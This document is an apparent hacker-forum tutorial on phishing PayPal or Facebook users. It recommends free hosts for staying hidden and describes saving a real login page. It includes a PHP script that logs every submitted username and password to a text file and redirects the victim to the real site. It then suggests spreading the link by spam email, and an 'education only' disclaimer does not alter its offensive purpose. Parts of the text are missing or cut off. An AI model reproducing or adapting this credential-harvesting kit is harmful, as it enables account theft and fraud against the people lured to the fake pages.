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Basic Phishing tutorial

Today I will write for something very powerful in hacking phishing this is the one of
the most illegal techniques in hacking.
!Im not responsible for your actions I write this for education purpose only if you
get in to trouble Im not responsible!
Phishing is highly illegal so if you are new to hacking I will recommend first to do
other stuff like RATing and keylogging then phishing.
When you are phishing you have to highly protect your self.

First you need to sing up in very secure hosting. That wont get you in trouble I
cant recommend you but after short search on internet I found some.


cwahi - http://cwahi.com
110mb - http://110mb.com
Ripway - http://ripway.com
SuperFreeHost - http://superfreehost.info
Freehostia - http://freehostia.com
Freeweb7 - http://freeweb7.com
t35 - http://t35.com
Awardspace - http://awardspace.com
PHPNet - http://phpnet.us
Free Web Hosting Pro - http://freewebhostingpro.com
ProHosts - http://prohosts.org
FreeZoka - http://www.freezoka.com/
000webhost - http://000webhost.com/
AtSpace - http://atspace.com

hostings. I havent found paid but I thing that they are more secure.

So when you have found hosting its time to create phishing pages.

Lets say you have target Paypal (I wont recommend to target it when you dont have
experience ) you will need login from there to get them there are 2 ways.

1.To use tool called Phish Creator - http://www.youtube.com/watch?v=xoTHvHQsroA

I dont know is it backdoored or not.
For linux users - http://www.youtube.com/watch?v=C_lFkiOYy...re=related
2.To do it manually.

Ok go to Paypal login page(in our case if you are going to phish Facebooks go to
Facebook login page) and save it.
Now you should create script that will record all variable write in the page I cant
help you here.

kidding open editor(notepad for example) and write this script.

header("Location: paypal.com");
$handle = fopen("accs.txt", "a");
foreach($_GET as $variable => $value)
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
fwrite($handle, "\r\n");

Paste this and edit where is needed then save this will save all accs to accs.txt.
Now you should link this page to the save you have save earlier.
Open saved login page with editor and find "action=" and change it with page you have


will become


What you just did is to call your own script when the user submit its form using the
action command in html, so now you have the password and the user is redirected to
original page.

You are ready now its time to start spreading your link .
Im not the best in this section but I can help .
E-mail Spam - This is highly illegal too. But in our case we attack paypal so lets
the system and they need to enter their information again.
- Belive or not this is very effective way.

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